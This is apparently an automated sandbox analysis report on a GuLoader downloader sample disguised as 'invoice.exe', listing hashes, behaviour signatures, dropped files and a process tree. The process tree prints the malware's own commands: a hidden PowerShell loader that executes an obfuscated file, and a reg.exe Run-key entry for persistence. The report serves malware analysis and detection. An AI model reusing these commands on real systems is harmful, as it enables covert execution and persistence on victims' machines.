Resubmissions

09-07-2024 12:36

240709-pta39awcnf 10

09-07-2024 11:28

240709-nlhmpatdjh 10

Analysis

  • max time kernel
    361s
  • max time network
    362s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    09-07-2024 12:36

General

  • Target

    invoice.exe

  • Size

    463KB

  • MD5

    5cb973edda7244515c1ddf1f532b67bc

  • SHA1

    e03200f1949f4c85379cb31d2d61165794efb481

  • SHA256

    2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c

  • SHA512

    220f5d5b8677de13495525bc825e048f25dbd9fe829f37e31a64f5ee72cf62945a1d71456a4438f96cd58496289f3cbccb2d7a3ee7fbe1c75e0ee15c93bad9ed

  • SSDEEP

    12288:uKYi/LALj3EpUkdwsVZKRukGeYO+NRPNTvJiYn:bFD6rXsgPQhNRPNTxiYn

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\invoice.exe
    "C:\Users\Admin\AppData\Local\Temp\invoice.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Udlbstidspunkter=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi';$Subdelegate=$Udlbstidspunkter.SubString(69683,3);.$Subdelegate($Udlbstidspunkter)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe
        "C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1536
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:1144

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi

    Filesize

    68KB

    MD5

    9f369129a14ef6d8d0867ec4d9b6eb19

    SHA1

    2a56ca0fb0b4590c030d293a7829ac087212821b

    SHA256

    9f288ab07bf267422b4670dfd87f373115682a026e63db13e9bab44977c8cc0f

    SHA512

    d8fd8aeabfa1bd47f0d3ca2208ac9154496d9b38ef6b185a3c9bf26877539f57a5b0e022c02ae2121a68f74ab13f45f446124dc6d8d90020defd1abeb2825326

  • C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Typehuses.Ver

    Filesize

    327KB

    MD5

    edd82166d9af4f94ca8413254ad27eee

    SHA1

    cbe26db0839f63fc825205293f32660e8fa4b63c

    SHA256

    b1246b2938bd2fa73f3a6679ea5040697db9a6ace3607fd2f20c5db2eeecc907

    SHA512

    7f25fac516c23cdddfbf8f22e3f29e23c599ceacdfcf5d84531535e7838114bc982bef629ab219c7a17bcbc9ac97f159642297da7e2c1d8fa8d921917986fae8

  • C:\Users\Admin\Desktop\Flyverdragter.lnk

    Filesize

    1KB

    MD5

    a4240ca5f5d3795a423c50c6e7c436dd

    SHA1

    40893606a5fb47d7f46065d230373ea08f8ed496

    SHA256

    c543244dfa80165283c6cb6d4a133164b98e7ef022d1bc268c6b56d9addfc83b

    SHA512

    bef519e0dfee8a9f628ea402b18b51aeb9b58fe59b121e9dc14384dae56f92e309f32c0ff6fae5a5873f4069043cf184d56d70fb7644cd29481e5174b2d38b1e

  • \Users\Admin\AppData\Local\Temp\Observerbare86.exe

    Filesize

    463KB

    MD5

    5cb973edda7244515c1ddf1f532b67bc

    SHA1

    e03200f1949f4c85379cb31d2d61165794efb481

    SHA256

    2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c

    SHA512

    220f5d5b8677de13495525bc825e048f25dbd9fe829f37e31a64f5ee72cf62945a1d71456a4438f96cd58496289f3cbccb2d7a3ee7fbe1c75e0ee15c93bad9ed

  • \Users\Admin\AppData\Local\Temp\nsyB2AD.tmp\BgImage.dll

    Filesize

    7KB

    MD5

    350a507070ed063ac6a511aeef67861a

    SHA1

    cf647b90a1212e090f1d236d1b50a5010cbf3bae

    SHA256

    5c66abd3f06eaa357ed9663224c927cf7120dca010572103faa88832bb31c5ab

    SHA512

    cde5747cc8539625e4262afad9699ce4e8325133d7ed7f47b9d46989a7aa0d2cc2488441acc57368f485ef1dd3e02b9ef2faa642f68e9f1db53a39e0f896d468

  • \Users\Admin\AppData\Local\Temp\nsyB2AD.tmp\nsDialogs.dll

    Filesize

    9KB

    MD5

    13b6a88cf284d0f45619e76191e2b995

    SHA1

    09ebb0eb4b1dca73d354368414906fc5ad667e06

    SHA256

    cb958e21c3935ef7697a2f14d64cae0f9264c91a92d2deeb821ba58852dac911

    SHA512

    2aeeae709d759e34592d8a06c90e58aa747e14d54be95fb133994fdcebb1bdc8bc5d82782d0c8c3cdfd35c7bea5d7105379d3c3a25377a8c958c7b2555b1209e

  • \Users\Admin\AppData\Local\Temp\nsyB2AD.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    b648c78981c02c434d6a04d4422a6198

    SHA1

    74d99eed1eae76c7f43454c01cdb7030e5772fc2

    SHA256

    3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

    SHA512

    219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

  • memory/1816-181-0x0000000074421000-0x0000000074422000-memory.dmp

    Filesize

    4KB

  • memory/1816-182-0x0000000074420000-0x00000000749CB000-memory.dmp

    Filesize

    5.7MB

  • memory/1816-187-0x0000000074420000-0x00000000749CB000-memory.dmp

    Filesize

    5.7MB

  • memory/1816-183-0x0000000074420000-0x00000000749CB000-memory.dmp

    Filesize

    5.7MB

  • memory/1816-189-0x0000000074420000-0x00000000749CB000-memory.dmp

    Filesize

    5.7MB

  • memory/1816-190-0x0000000006720000-0x000000000762B000-memory.dmp

    Filesize

    15.0MB

  • memory/1816-184-0x0000000074420000-0x00000000749CB000-memory.dmp

    Filesize

    5.7MB

  • memory/1816-195-0x0000000074420000-0x00000000749CB000-memory.dmp

    Filesize

    5.7MB

  • memory/2980-196-0x0000000000450000-0x00000000014B2000-memory.dmp

    Filesize

    16.4MB

  • memory/2980-216-0x00000000014C0000-0x00000000023CB000-memory.dmp

    Filesize

    15.0MB